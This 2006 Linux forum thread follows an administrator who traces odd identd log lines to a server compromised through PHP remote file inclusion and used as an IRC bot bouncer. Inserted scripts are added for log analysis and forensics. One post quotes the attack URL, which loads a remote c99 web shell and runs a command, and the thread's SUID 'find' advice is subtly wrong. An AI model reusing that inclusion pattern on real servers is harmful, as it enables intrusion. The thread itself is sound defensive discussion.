04-07-2006, 07:03 PM | #1 | LQ Newbie | Registered: Apr 2006 | Posts: 6
What is this?
I am getting a bunch of this crap in my messages log. Anybody know what to make of it? Do I need to take action?
Thanks in advance
in.identd[21618]: reply to 62.231.74.10: 41501 , 6667 : USERID : OTHER :99
Apr 7 20:07:45 ns1 in.identd[21619]: reply to 193.110.95.1: 41502 , 7777 : USERID : OTHER :99
Apr 7 20:07:57 ns1 in.identd[21620]: reply to 195.197.175.21: 41507 , 7000 : USERID : OTHER :99
Apr 7 20:07:59 ns1 in.identd[21621]: reply to 161.53.178.240: 41508 , 6667 : USERID : OTHER :99
Apr 7 20:08:03 ns1 in.identd[21622]: reply to 69.16.172.34: 41510 , 7000 : USERID : OTHER :99
Apr 7 20:08:06 ns1 in.identd[21623]: reply to 195.47.220.2: 41511 , 6667 : USERID : OTHER :99
Apr 7 20:08:09 ns1 in.identd[21624]: reply to 195.144.12.5: 41512 , 7000 : USERID : OTHER :99
Apr 7 20:09:48 ns1 in.identd[21628]: reply to 195.197.175.21: 41518 , 7000 : USERID : OTHER :99
Apr 7 20:09:52 ns1 in.identd[21629]: reply to 194.109.20.90: 41520 , 6667 : USERID : OTHER :99
Apr 7 20:09:54 ns1 in.identd[21630]: reply to 194.134.7.194: 41521 , 6662 : USERID : OTHER :99
Apr 7 20:09:55 ns1 in.identd[21631]: reply to 194.134.7.195: 41522 , 6667 : USERID : OTHER :99
Apr 7 20:09:57 ns1 in.identd[21634]: reply to 62.231.74.10: 41523 , 6667 : USERID : OTHER :99
Apr 7 20:10:00 ns1 in.identd[21635]: reply to 193.110.95.1: 41524 , 7777 : USERID : OTHER :99
Apr 7 20:10:36 ns1 in.identd[21636]: reply to 195.197.175.21: 41527 , 6667 : USERID : OTHER :99
Apr 7 20:10:38 ns1 in.identd[21637]: reply to 195.197.175.21: 41528 , 7000 : USERID : OTHER :99
Apr 7 20:10:40 ns1 in.identd[21638]: reply to 161.53.178.240: 41529 , 6667 : USERID : OTHER :99
Apr 7 20:10:44 ns1 in.identd[21639]: reply to 69.16.172.34: 41531 , 7000 : USERID : OTHER :99
Apr 7 20:10:47 ns1 in.identd[21640]: reply to 195.47.220.2: 41532 , 6667 : USERID : OTHER :99
Apr 7 20:10:49 ns1 in.identd[21641]: reply to 195.144.12.5: 41533 , 7000 : USERID : OTHER :99
Apr 7 20:12:28 ns1 in.identd[21642]: reply to 195.197.175.21: 41537 , 7000 : USERID : OTHER :99
Apr 7 20:12:32 ns1 in.identd[21643]: reply to 194.109.20.90: 41539 , 6667 : USERID : OTHER :99
Apr 7 20:12:34 ns1 in.identd[21644]: reply to 194.134.7.194: 41540 , 6662 : USERID : OTHER :99
Apr 7 20:12:35 ns1 in.identd[21645]: reply to 194.134.7.195: 41541 , 6667 : USERID : OTHER :99
Apr 7 20:12:37 ns1 in.identd[21646]: reply to 62.231.74.10: 41542 , 6667 : USERID : OTHER :99
Apr 7 20:12:40 ns1 in.identd[21647]: reply to 193.110.95.1: 41543 , 7777 : USERID : OTHER :99
Apr 7 20:13:16 ns1 in.identd[21648]: reply to 195.144.12.5: 41546 , 6667 : USERID : OTHER :99
Apr 7 20:13:18 ns1 in.identd[21652]: reply to 195.197.175.21: 41547 , 7000 : USERID : OTHER :99
Apr 7 20:13:20 ns1 in.identd[21653]: reply to 161.53.178.240: 41548 , 6667 : USERID : OTHER :99
Apr 7 20:13:24 ns1 in.identd[21655]: reply to 69.16.172.34: 41550 , 7000 : USERID : OTHER :99
Apr 7 20:13:25 ns1 in.identd[21657]: reply to 195.47.220.2: 41551 , 6667 : USERID : OTHER :99
Apr 7 20:13:27 ns1 in.identd[21659]: reply to 195.144.12.5: 41552 , 7000 : USERID : OTHER :99
Apr 7 20:15:06 ns1 in.identd[21660]: reply to 195.197.175.21: 41556 , 7000 : USERID : OTHER :99
04-07-2006, 07:06 PM | #2 | Member | Registered: Feb 2003 | Location: Poole, Dorset, England | Distribution: Fedora Core 5 | Posts: 80
No action is required for that, it is simply your IDENTD responding to IRC Servers/Users on request which is normal.
04-07-2006, 11:24 PM | #3 | Senior Member | Registered: Mar 2003 | Distribution: Fedora | Posts: 3,658
//Moderator note: Moving this post to its own thread. In the future please start a new thread if your topic isn't directly related to the existing one. Thank you.
04-07-2006, 11:26 PM | #4 | Senior Member | Registered: Mar 2003 | Distribution: Fedora | Posts: 3,658
Out of curiosity, should this system be running irc and identd in the first place?
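The identd lines in the first post, read as connection evidence: a remote server asks identd who owns the connection from this host's port 415xx to its own port 6667/7000/7777, so each reply records an outbound connection opened from this machine to an IRC-style port. The shell snippet below is an added example (not from the thread) that tallies those peers from a syslog stream; the sample lines are constructed in the same format, and the 203.0.113.9 entry is a made-up non-IRC peer for contrast.

```shell
#!/bin/sh
# Constructed sample in the format of the thread's messages log (not the original data).
SAMPLE_LOG='Apr 7 20:07:45 ns1 in.identd[21619]: reply to 193.110.95.1: 41502 , 7777 : USERID : OTHER :99
Apr 7 20:07:57 ns1 in.identd[21620]: reply to 195.197.175.21: 41507 , 7000 : USERID : OTHER :99
Apr 7 20:08:01 ns1 sshd[21625]: Accepted publickey for admin from 10.0.0.5 port 51234 ssh2
Apr 7 20:08:30 ns1 in.identd[21626]: reply to 203.0.113.9: 41600 , 80 : USERID : OTHER :99
Apr 7 20:09:48 ns1 in.identd[21628]: reply to 195.197.175.21: 41518 , 7000 : USERID : OTHER :99
Apr 7 20:09:57 ns1 in.identd[21634]: reply to 62.231.74.10: 41523 , 6667 : USERID : OTHER :99'

# Reads syslog lines on stdin and prints one line per peer:
#   <remote ip> <remote port> <reply count> <tag>
# tag is "irc-range" for ports 6660-7000 and 7777 (the usual IRC server ports), else "other".
identd_summary() {
  awk '
    /in\.identd\[[0-9]+\]: reply to / {
      for (i = 1; i < NF; i++) {
        if ($i == "reply" && $(i+1) == "to") {
          ip = $(i+2); sub(/:$/, "", ip)   # "193.110.95.1:" -> strip trailing colon
          rport = $(i+5) + 0                # fields after the IP: LPORT , RPORT
          count[ip " " rport]++
          break
        }
      }
    }
    END {
      for (k in count) {
        split(k, p, " "); port = p[2] + 0
        tag = ((port >= 6660 && port <= 7000) || port == 7777) ? "irc-range" : "other"
        print k, count[k], tag
      }
    }' | sort
}

# Only the peers that look like IRC servers: if nobody on this box should be on IRC,
# every line here is a connection that needs explaining.
irc_peers() {
  identd_summary | awk '$4 == "irc-range" { print $1, $2, $3 }'
}

printf '%s\n' "$SAMPLE_LOG" | identd_summary
```

Feed the real file with `identd_summary < /var/log/messages` (or `irc_peers`); repeated replies to the same host and port over minutes, as in the thread, mean the connection is being kept alive, not a one-off probe.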
04-07-2006, 11:37 PM | #5 | LQ Newbie | Registered: Apr 2006 | Posts: 6 | Original Poster
No
I thought I was just adding to the thread. I was following steps to stop SSH attacks and ran across that as well. And the answer is no, I had no IRC service or users of those IP ranges. I found a shell script uploaded in the incoming pub, some bot for Mecwars IRC. I did kill it. Thanks,
After digging in a bit I found that they had used some type of remote thread that may be a risk to others I should mention. It looked like this
http://***.com/SQuery.keep/lib/armygame.php?libpath=http://***.com/image/.nd/c99last.txt?&cmd=id
It opens a shell script that launches the bot. I have no idea why they were bouncing through me other than to mask IPs, I guess. I contacted the other domain about the malware and have got no reply. Nice little bugger though.
Last edited by jshonk; 04-07-2006 at 11:49 PM.
04-08-2006, 12:08 AM | #6 | Senior Member | Registered: Mar 2003 | Distribution: Fedora | Posts: 3,658
Quote:
After digging in a bit I found that they had used some type of remote thread that may be a risk to others I should mention. It looked like this
http://***.com/SQuery.keep/lib/armyg...st.txt?&cmd=id
It's likely this vulnerability. Not a zero-day, but certainly recent. It allows arbitrary code execution, so you'll need to perform a detailed forensic analysis to determine the extent of the compromise. If that's the only entry you're seeing in your logs, then I'd be concerned about log deletion.
Quote:
It opens a shell script that launches the bot.
Obviously look at ownership of any scripts or binaries. Where were these located, in /tmp or somewhere else?
Quote:
I have no idea why they were bouncing through me other than to mask IPs, I guess.
Sounds like the typical IRC bouncer. Anything else of interest?
04-08-2006, 12:39 AM | #7 | LQ Newbie | Registered: Apr 2006 | Posts: 6 | Original Poster
Yep, tmp
Quote:
Where were these located, in /tmp or somewhere else?
Yea, /tmp and /usr/tmp
Quote:
Sounds like the typical IRC bouncer, anything else of interest?
Just the shell.php I found in the pub
Quote:
so you'll need to perform a detailed forensic analysis to determine the extent of the compromise. If that's the only entry you're seeing in your logs, then I'd be concerned about log deletion.
What's the best way to go about this? Any ideas?
04-08-2006, 01:20 AM | #8 | Senior Member | Registered: Mar 2003 | Distribution: Fedora | Posts: 3,658
Quote:
Originally Posted by jshonk
What's the best way to go about this? Any ideas?
There are several checklists available in the Security References thread put together by UnSpawn. You can find the thread at the top of the forum or via the link in my sig.
Start out by taking a listing of all network connections and process info (ps aux). If you still see any suspicious processes or network daemons, you should take the system offline. Then thoroughly look through all of the logs on the system with an eye out for any abnormal messages or errors, esp. application errors or kernel panics/oopses. Make sure to go through the http logs with a fine-tooth comb and see if you can reconstruct what cmds were executed during the exploitation (i.e. in the url you posted the 'id' command was run). Look at login info (w/ last -i and lastb) for any suspicious login info.
You can get a listing of all the files that have been created by the web user that PHP was running under (usually this is 'nobody' or 'apache') using the command find / -user <web_user>. You should also get a listing of all the SUID/SGID root files on the system using find / -perm 2000 -o -perm 4000.
I'd also recommend installing/running chkrootkit and/or rkhunter on the system in order to identify signs of a rootkit as well as other common signs of a compromise.
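The file-system part of the checklist above (files owned by the web user, SUID/SGID files, fresh files in /tmp and /usr/tmp), as an added example that is not from the thread: functions scoped to a root directory so they can be pointed at / on the compromised box or, as at the bottom, at a constructed scratch tree. The scratch tree, its file names and the baseline file are all made up for the demonstration; the find options `-user`, `-perm -4000` and `-mmin` are standard on GNU and BSD find.

```shell
#!/bin/sh
# Files owned by the user PHP ran as: anything it wrote is a candidate dropped file.
files_owned_by() {           # $1 = user name or numeric uid, $2 = root dir
  find "$2" -xdev -user "$1" -type f 2>/dev/null | sort
}

# SUID/SGID files. "-perm -4000" means "has at least the setuid bit", so a 4755 binary
# matches; an exact-mode test would only match files whose whole mode is 4000.
suid_sgid_files() {          # $1 = root dir
  find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Files modified within the last N minutes under the usual drop directories.
recent_in_dropdirs() {       # $1 = minutes, then one or more directories
  mins=$1; shift
  find "$@" -xdev -type f -mmin "-$mins" 2>/dev/null | sort
}

# SUID/SGID entries not present in a baseline list taken from a known-good system
# (one path per line, sorted). Only the extras are printed.
new_suid_vs_baseline() {     # $1 = root dir, $2 = baseline file
  suid_sgid_files "$1" | comm -13 "$2" -
}

# Constructed scratch tree standing in for the compromised host (demo data only).
make_scratch_tree() {
  d=$(mktemp -d)
  mkdir -p "$d/tmp" "$d/usr/tmp" "$d/usr/bin" "$d/var/www/pub"
  printf 'x' > "$d/usr/bin/legit"                 # a known setuid binary
  chmod 4755 "$d/usr/bin/legit"
  printf '#!/bin/sh\n' > "$d/tmp/.bot.sh"         # dropped bot launcher, made setuid
  chmod 4755 "$d/tmp/.bot.sh"
  printf '<?php\n' > "$d/var/www/pub/shell.php"   # uploaded web shell
  printf '%s\n' "$d/usr/bin/legit" > "$d/baseline.txt"
  echo "$d"
}

T=$(make_scratch_tree)
echo "== SUID/SGID files not in baseline =="; new_suid_vs_baseline "$T" "$T/baseline.txt"
echo "== files touched in the last hour under drop dirs =="; recent_in_dropdirs 60 "$T/tmp" "$T/usr/tmp"
echo "== files owned by uid $(id -u) =="; files_owned_by "$(id -u)" "$T"
rm -rf "$T"
```

On a live system run the functions against / (and the real web user) before rebooting, since a reboot loses the process and connection state the first checklist steps rely on.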
04-08-2006, 08:25 AM | #9 | LQ Newbie | Registered: Apr 2006 | Posts: 6 | Original Poster
All good
Well, looks all good now. The only thing I regret is having to reboot to make sure there were no scripts running again. I was up for 716 days and ironically it's my birthday. Thanks man